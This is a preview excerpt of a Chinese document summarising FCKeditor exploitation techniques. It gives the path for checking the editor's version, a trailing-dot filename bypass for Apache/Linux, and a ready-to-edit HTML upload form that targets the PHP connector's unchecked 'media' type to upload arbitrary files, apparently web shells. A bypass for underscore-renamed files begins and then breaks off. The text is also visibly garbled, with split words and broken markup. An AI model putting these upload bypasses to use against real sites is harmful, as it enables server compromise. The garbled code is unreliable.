Fckeditor漏洞利用总结.docxVIP

  • 8
  • 0
  • 约4.4千字
  • 约 8页
  • 2019-06-20 发布于广东
  • 举报
Fckeditor漏洞利用总结 Fckeditor漏洞利用总结 查看编辑器版本 Fckeditor/_whatsnew. html Version2. 2 版本 Apache+linux环境下在上传文件后面加个.突破!测试 通过。 Versionl t ;=2. 4. 2For php在处理PHP上传的地方并 未对media类型进行上传文件类型的控制,导致用户上传 任意文件!将以下保存为ht ml文件,修改acti on地址。 lt;f ormid二〃fmiU ploacTencty pe=/zmultipa rt/formdat a/z action二 〃http://www . site?com/F ckeditor/ed itor/filema nager/uploa d/php/uploa d. php?Type= media/zmetho d二〃post〃gt ;Uploadanewf ile: It ;brgt ; It;input type二〃file name二〃NewFi le〃size二〃50 /zgt; It ;brgt ; It;input id二〃btnUplo ad〃type二〃su bmit〃value二 Z/Upload/Zgt; It;/formgt; 4?Fckeditor文件上传”变下划线的绕过方 法 很多时候上传的文件例如:s hell.

文档评论(0)

1亿VIP精品文档

相关文档